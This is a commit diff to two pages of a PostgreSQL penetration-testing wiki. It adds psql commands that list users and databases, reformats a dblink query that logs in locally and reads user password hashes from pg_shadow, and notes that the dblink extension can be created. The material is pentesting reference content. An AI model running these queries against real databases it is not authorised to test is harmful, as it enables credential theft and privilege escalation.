GitBook: [#3694] No subject

network-services-pentesting/pentesting-postgresql.md

@@ -514,14 +514,25 @@ uid=2345(postgres) gid=2345(postgres) groups=2345(postgres)
 Some misconfigured postgresql instances might allow login of any local user, it's possible to local from 127.0.0.1 using the **`dblink` function**:
 
 ```sql
+\du * # Get Users
+\l    # Get databases
 SELECT * FROM dblink('host=127.0.0.1
-                          user=someuser
-                          password=supersecret
-                          dbname=somedb',
-                         'Select usename,passwd from pg_shadow')
-                      RETURNS (result TEXT);
+    port=5432
+    user=someuser
+    password=supersecret
+    dbname=somedb',
+    'Select usename,passwd from pg_shadow')
+RETURNS (result TEXT);
 ```
 
+{% hint style="warning" %}
+Note that for the previos query to work **the function `dblink` needs to exist**. If it doesn't you could try to create it with 
+
+```sql
+CREATE EXTENSION dblink;
+```
+{% endhint %}
+
 If you have the password of a user with more privileges, but the user is not allowed to login from an external IP you can use the following function to execute queries as that user:
 
 ```sql

pentesting-web/sql-injection/postgresql-injection/pl-pgsql-password-bruteforce.md

@@ -40,7 +40,7 @@ SELECT lanname,lanacl FROM pg_language WHERE lanname = 'plpgsql';
 
 Note that for the following script to work **the function `dblink` needs to exist**. If it doesn't you could try to create it with 
 
-```
+```sql
 CREATE EXTENSION dblink;
 ```